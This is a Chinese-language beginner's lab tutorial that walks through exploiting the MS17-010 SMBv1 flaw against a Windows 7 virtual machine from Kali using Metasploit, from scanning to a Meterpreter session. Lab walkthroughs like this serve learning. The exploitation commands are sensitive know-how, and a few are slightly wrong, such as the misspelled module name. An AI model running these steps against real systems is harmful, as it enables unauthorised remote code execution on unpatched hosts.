网络安全学习之旅2

利用MS17-010攻击win7系统

ms17-010是利用445端口的
当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时，存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。

一、准备阶段
1、VM虚拟机kali-linux系统以及win7系统（记得设置快照，以防蓝屏）

2、将网卡设置为NAT模式，并获取win7以及kali系统的ip地址（如果一开始不是NAT模式，最好记得重启网卡）
重启网卡：
kali：service networking restart
ip地址：
kali：ip -a
win7: ipconfig

3、这时候kali和win7应该是属于一个网段，我们来测试连通性
利用kali ping win7看看能不能ping通
kali：ping win7ip地址

二、攻击阶段
1、我们进入msf平台
kali：msfconsole

2、第一次我们就直接搜索漏洞模块好了（nmap从下一次开始用）
kali：search ms17-010

3、这时候会出来几个选项
我们刚学的人，一步步来
我们使用扫描模块
kali：use auxiliary/scanner/smb/smb_ms17_010
kali:show options

4、这时候，我们将选项展开，看看需要些哪些信息

可以明显看见，我们需要填写攻击端口，以及目标ip地址

这里用set命令
set完毕后
我们使用run或者exploit

5、这时候我们使用攻击模块
kali:use exploit/windows/smb/ms17_010_exernalblue

一样的我们查看需要填写些什么
kali：show options
并设置set
设置完毕后使用run或者exploit

当我们进入meterpreter的界面时，代表这次进攻已经拿下了对面。

有改进之处请大佬指正^_